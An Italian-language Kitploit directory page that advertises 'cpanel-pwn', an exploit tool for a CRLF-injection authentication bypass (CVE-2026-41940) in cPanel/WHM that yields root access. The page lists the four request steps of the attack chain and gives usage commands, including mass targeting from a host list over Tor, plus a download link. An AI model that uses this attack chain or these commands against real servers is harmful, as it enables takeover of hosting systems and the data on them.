Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cpanel-pwn — cPanel/WHM CVE-2026-41940 exploit per bypass dell'autenticazione tramite iniezione CRLF | Kitploit
Strumenti/GitHubGitHub/richflexpix/cpanel-pwn
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneRed Teaming
GitHubrichflexpix/cpanel-pwn

cpanel-pwn

cPanel/WHM CVE-2026-41940 exploit per bypass dell'autenticazione tramite iniezione CRLF

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

cpanel-pwn

Kit di test di sicurezza per cPanel/WHM. Implementa il bypass dell'autenticazione tramite iniezione CRLF CVE-2026-41940 e il pivot dei privilegi post-exploitation.

Strumenti

ScriptScopo
cpanel_exploit.pyCVE-2026-41940: iniezione CRLF → bypass autenticazione WHM → accesso root

CVE-2026-41940

Tipo: Iniezione CRLF → Bypass dell'autenticazione → RCE come root
Interessati: cPanel/WHM < versioni patchate
Attacco: L'iniezione CRLF pre-autenticazione nell'header Basic Auth inietta nel file di sessione lato server, elevando una sessione non autenticata a root WHM.

hasroot=1
root@kitploit:~
Fase 1: POST /login/?login_only=1          → genera sessione pre-autenticazione
Fase 2: GET / Authorization:Basic <CRLF>   → inietta hasroot=1, fa trapelare il token cpsess
Fase 3: GET /scripts2/listaccts            → attiva il gadget di propagazione della cache di sessione
Fase 4: GET /cpsess[TOKEN]/json-api/version → HTTP 200 + versione = ACCESSO ROOT

Utilizzo

root@kitploit:~
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only   # solo controllo CRLF, nessuna escalation privilegi

Autorizzazione

Solo per test di penetrazione autorizzati.

Scarica lo strumento